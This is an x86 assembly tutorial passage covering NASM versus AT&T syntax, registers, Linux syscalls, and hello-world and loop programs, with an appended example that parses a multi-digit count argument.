- In instructions that take a source and a destination operand, AT&T format writes the destination as the second operand (for example: CMD <source>,<dest>), whereas NASM writes the destination as the first operand (for example: CMD <dest>,<source>).
Category | Name | Description |
---|---|---|
General Purpose | EAX, EBX, ECX, EDX | 32 bits wide, may be used for any purpose. The E stands for Extended (originally the general-purpose registers were only 16 bits). |
 | AX, BX, CX, DX | The lower 16 bits of the 32-bit registers above. AX is the lower 16 bits of EAX. |
 | AH, AL, BH, BL, CH, CL, DH, DL | The 8-bit halves of the 16-bit registers above. AH is the upper 8 bits of AX, AL is the lower 8 bits of AX. |
Segment Register | CS, SS, DS, ES, FS, GS | Used to hold the first 16 bits of a memory address. CS = Code, SS = Stack, DS = Data, ES, FS, GS = extra segment registers. |
Offset Register | | Used to hold the last 16 bits of a memory address. A memory address is formed by combining segment and offset. |
 | EBP | Used as the frame offset within the stack. Usually points to the bottom of the stack frame of a function. ESP points to the top of the stack, EBP to its base. |
 | ESI | Usually used as the offset of the source string in operations on blocks of memory. |
 | EDI | Usually used as the offset of the destination string in operations on blocks of memory. |
 | ESP | Stack pointer, points to the top of the stack. |
Special | EFLAGS | Not usable by the programmer; used only by the processor for the results of logical operations and processor state. |
 | EIP | Not usable by the programmer; used only by the processor to hold the memory address of the next instruction to be executed. |
; section .text is reserved for code
section .text
global _start
_start:
    ; syscall => write(1, msg, len)
    mov edx,len     ; the string length goes in register EDX
    mov ecx,msg     ; the memory address of the string goes in register ECX
    mov ebx,1       ; the file descriptor (1 = stdout, by default the console) goes in register EBX
    mov eax,4       ; syscall number 4 is sys_write()
    int 0x80        ; invoke the system call with interrupt 0x80
    ; syscall => exit(0)
    xor ebx,ebx     ; set EBX to 0 as the return code for exit
    mov eax,1       ; syscall number 1 is exit()
    int 0x80        ; invoke the system call with interrupt 0x80
section .data       ; section .data is reserved for data/variables
msg db "Hello, World!",0xa  ; the string followed by 0xA, i.e. newline \n
len equ $ - msg             ; the string length is the address of this line minus the address of the string
$ nasm -f elf hello.asm
$ ld -s -o hello hello.o
$ ./hello
Hello, World!
#ifndef _ASM_I386_UNISTD_H_
#define _ASM_I386_UNISTD_H_
/*
 * This file contains the system call numbers.
 */
#define __NR_restart_syscall 0
#define __NR_exit 1
#define __NR_fork 2
#define __NR_read 3
#define __NR_write 4
#define __NR_open 5
#define __NR_close 6
#define __NR_waitpid 7
#define __NR_creat 8
$ man 2 write
SYNOPSIS
ssize_t write(int fd, const void *buf, size_t count);
$ man 2 exit
void _exit(int status);
NASM/Intel | AT&T | Description |
---|---|---|
MOV EAX, 0x51 | MOVL $0x51, %EAX | Load register EAX with the value 0x51 |
MOV ESP, EBP | MOVL %EBP, %ESP | Copy the contents of register EBP into register ESP |
NASM/Intel | AT&T | Description |
---|---|---|
XOR EBX,EAX | XOR %EAX,%EBX | XOR the contents of EBX with EAX, the result is stored in EBX |
NASM/Intel | AT&T | Description |
---|---|---|
INT 0x80 | INT $0x80 | Invoke interrupt number 0x80 |
section .text
global _start
_start:
    pop eax             ; pop argc (ignored)
    pop eax             ; pop argv[0] (ignored, it holds the program name)
    pop eax             ; pop argv[1] (this is passed to stringtoint)
    call stringtoint    ; ECX holds the integer argument, used as the counter
_print:
    push ecx            ; save the counter on the stack because ECX is also used in _print_hello
    call _print_hello   ; print hello world
    pop ecx             ; take the counter back from the stack because the loop needs it
    loop _print         ; decrement ECX by 1, if it is not yet 0 go back to _print
    ; this is the system call exit(0)
    mov ebx,0
    mov eax,1
    int 0x80
_print_hello:
    ; syscall write(1,msg,len)
    mov edx,len
    mov ecx,msg
    mov ebx,1
    mov eax,4
    int 0x80
    ret
stringtoint:
    ; convert the string at the location pointed to by EAX into an integer in ECX
    ; EAX = address of the string
    xor ecx,ecx         ; clear ECX
    xor ebx,ebx         ; clear EBX
    mov bl,[eax]        ; BL holds the ASCII code of the character at the location pointed to by EAX
    sub bl, 0x30        ; the ASCII codes of the digits are 30h-39h, so subtract 30h
    add ecx,ebx         ; add EBX to ECX, ECX now holds the integer value
    ret
section .data
msg db "Hello, World!",0xa
len equ $ - msg
$ nasm -f elf helloxtimes.asm
$ ld -s -o helloxtimes helloxtimes.o
$ ./helloxtimes 1
Hello, World!
$ ./helloxtimes 2
Hello, World!
Hello, World!
$ ./helloxtimes 3
Hello, World!
Hello, World!
Hello, World!
$ ./helloxtimes 4
Hello, World!
Hello, World!
Hello, World!
Hello, World!
“MOV EBX, [EAX]” is different from “MOV EBX,EAX”. MOV EBX,[EAX] copies the contents of memory at the address stored in EAX into register EBX, whereas MOV EBX,EAX copies the contents of register EAX into register EBX.
NASM/Intel | AT&T | Description |
---|---|---|
PUSH value | PUSHL value | Store a value on the stack |
POP dest | POPL dest | Take a value off the stack into dest |
The Stack Data Structure
PUSH EAX is equivalent to:
    SUB ESP, 4
    MOV DWORD PTR SS:[esp], EAX
POP EAX is equivalent to:
    MOV EAX, DWORD PTR SS:[esp]
    ADD ESP, 4
NASM/Intel | AT&T | Description |
---|---|---|
CALL subroutine1 | CALL subroutine1 | Call the procedure subroutine1 |
RET | RET | Return from the procedure |
NASM/Intel | AT&T | Description |
---|---|---|
LOOP address | LOOP address | Loop back to the location given by address while ECX > 0. |
DEC ECX      ; DECREMENT: ECX = ECX - 1, register ECX is decremented by 1
JNZ address  ; JUMP IF NOT ZERO: if ECX is still not 0, JUMP to address
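As an added example (not part of the tutorial), here is the helloxtimes program again with stringtoint generalized to read a multi-digit count, and with the count-0 case that LOOP cannot handle guarded by JECXZ; the file name and the extra labels are my own choice.

```nasm
; helloxtimes-multidigit.asm (added example, not from the tutorial)
; Same program as helloxtimes.asm, but stringtoint now reads every
; decimal digit of argv[1] instead of only the first one, and a count
; of 0 (or a missing / non-numeric argument) exits instead of looping.
;
; Build (32-bit ELF, as in the tutorial):
;   $ nasm -f elf helloxtimes-multidigit.asm
;   $ ld -s -o helloxtimes-multidigit helloxtimes-multidigit.o
; On a 64-bit host add -m elf_i386 to the ld command.

section .text
global _start

_start:
    pop eax                 ; argc (ignored)
    pop eax                 ; argv[0], the program name (ignored)
    pop eax                 ; argv[1], pointer to the count string
    test eax, eax           ; no argument at all: argv[1] is NULL
    jz _exit
    call stringtoint        ; ECX = integer value of the string
    jecxz _exit             ; count 0: never enter the loop, because LOOP
                            ; decrements first and would wrap ECX to 0xFFFFFFFF

_print:
    push ecx                ; save the counter, _print_hello clobbers ECX
    call _print_hello
    pop ecx
    loop _print             ; ECX = ECX - 1, jump while ECX != 0

_exit:
    ; exit(0)
    xor ebx, ebx
    mov eax, 1
    int 0x80

_print_hello:
    ; write(1, msg, len)
    mov edx, len
    mov ecx, msg
    mov ebx, 1
    mov eax, 4
    int 0x80
    ret

stringtoint:
    ; IN:  EAX = address of a NUL-terminated string such as "123"
    ; OUT: ECX = its decimal value (0 if the string starts with a non-digit)
    ; Clobbers EAX and EBX. Parsing stops at the first non-digit, which
    ; includes the terminating NUL, so no separate length check is needed.
    xor ecx, ecx            ; accumulator = 0
    xor ebx, ebx            ; EBX holds the current digit, upper bytes zero
.next:
    mov bl, [eax]           ; load one character
    cmp bl, '0'
    jb .done                ; below '0' (for example NUL) -> finished
    cmp bl, '9'
    ja .done                ; above '9' -> finished
    sub bl, '0'             ; ASCII digit -> numeric value 0..9
    imul ecx, ecx, 10       ; accumulator = accumulator * 10
    add ecx, ebx            ; accumulator = accumulator + digit
    inc eax                 ; advance to the next character
    jmp .next
.done:
    ret

section .data
msg db "Hello, World!", 0xa
len equ $ - msg
```

Running it with an argument such as 12 prints the line twelve times, while 0, a missing argument, or a non-numeric argument exits immediately rather than looping about four billion times.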